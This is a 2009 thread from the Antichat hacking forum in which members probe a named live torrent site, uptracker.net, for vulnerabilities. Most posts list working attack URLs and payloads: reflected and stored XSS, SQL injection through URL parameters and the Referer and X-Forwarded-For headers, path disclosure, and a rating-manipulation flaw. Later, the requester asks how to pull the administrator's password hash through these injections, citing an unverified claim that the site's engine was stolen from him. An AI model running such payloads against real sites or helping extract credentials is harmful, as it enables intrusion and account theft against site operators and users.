Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   uptracker.net - торрент трекер (https://forum.antichat.xyz/showthread.php?t=103220)

Arigona 26.01.2009 20:47
uptracker.net - торрент трекер
 
Прошу проверить сайт на уязвимости, www.uptracker.net

P.S. Прошу тут выкладывать уязвимости и не ломать.

С меня + сколько смогу...

Всем спасибо

oRb 27.01.2009 13:56
Банально XSS в поиске:
http://www.uptracker.net/search.php?search=%22%3E%3Cscript%3Ealert%28docume nt.cookie%29%3C%2Fscript%3E

Скуль+раскрытие путей
http://www.uptracker.net/userdetails.php?id=723983'

Активная XSS в чате
http://www.uptracker.net/vorbeste.php
<img src='a' onerror='alert()'/>

Maestus 27.01.2009 16:37
SQL иньекции


в
1./search.php
2./faq_ru.php
3./index.php
4./recover.php
5./confirm_no_email.php
6./takelanguage.php
7./forums.php
8./login.php
9./userdetails.php
т.д. (дальше не проверял)

которые возникают из-за недостаточной фильтрации следующих полей http запросов:

referer:'
x-forwarded-for:'
client-ip:'

Цитата:
SQL Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '>= first AND <= last' at line 1
XSS в
/recover.php
если в POST запросе значение email передать к примеру
<script>alert(12345)</script>

BlackSun 27.01.2009 16:57
Раскрытие путей
http://uptracker.net/login.php?returnto[]=x
http://uptracker.net/topten.php?type[]=

404 (ссылка с профиля)
http://uptracker.net/fotogallery.php

SQL-inj (не раскручивал, некоторые, возможно, не представляют опасности, но как минимум - раскрытие путей)
// UPDATE, имхо
http://uptracker.net/details.php?id=-1'
http://uptracker.net/sendmessage.php?receiver=-1'
http://uptracker.net/browse.php?cat=-1'&incldead=1
users.php - любые параметры.

Активная XSS
http://uptracker.net/details.php?id=7614&viewcomm=6693#comm6693
<img src=. onerror=alert()>
------------
В форуме http://uptracker.net/forums.php?action=viewtopic&topicid=3114
<img src=. onerror=alert()>
-----------
http://uptracker.net/musik.php
Уязвимы все поля
-----------
Так же активка в ПМе.
-----------
Активка в профиле - подпись или информация
<img src=. onerror=alert()>

Накрутка рейтинга релиза -
onClick="update_rating(999) - функция не проверяет переданное значение

Пассивная XSS
http://uptracker.net/friends.php?action=add&type=friend&targetid=<scrip t>alert()</script>
http://uptracker.net/forums.php?action=<script>alert()</script>

Arigona 27.01.2009 17:13
Спасибо большое за старания, ещё вопрос. Можно ли как нибудь узнать через скуль - хэш админа ? Ну через преведённые ваши скуль иньекции?

Вы меня простите, я в этом не очень...

BlackSun 27.01.2009 17:17
Цитата:
Сообщение от Arigona
Спасибо большое за старания, ещё вопрос. Можно ли как нибудь узнать через скуль - хэш админа ? Ну через преведённые ваши скуль иньекции?

Вы меня простите, я в этом не очень...
Через скулю можно узнать не только хэш, при наличии привелегий рута у текушего юзера БД можно читать \ загружать файлы.

Arigona 27.01.2009 17:24
BlackSun, можеш привести пример для узнования хэша админа? Через какую- то скулю, или заливка шелла или узнавание пароля дб? Извени за глупый вопрос конечно :( Просто для меня это важно :( Я писал этот движёк с TS обычного, и у меня его украли, ps и сделали на нём другие трекера... Вот хочу посмотреть что можно сделать ...

Пс, если что найдёш скинь в личку пожалуйста..

С меня + и уважение, хотя я тут всех уважаю :)

Спасибо заранее..

baltazar 27.01.2009 19:39
[оффтоп]как ты мог его писать,у испанцев каких-то спи3*ил,баннеров еще бы штук 20 нацепил бы[/оффтоп]

по сабжу

пасивная КСС

Код:
http://www.uptracker.net/viewrequests.php?category=%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

Arigona 27.01.2009 20:19
ПС, для красоты сделал. если не нравится сниму :)

Спасибо за помощь) Если кто ещё может решиться помочь.. пишите


Время: 08:08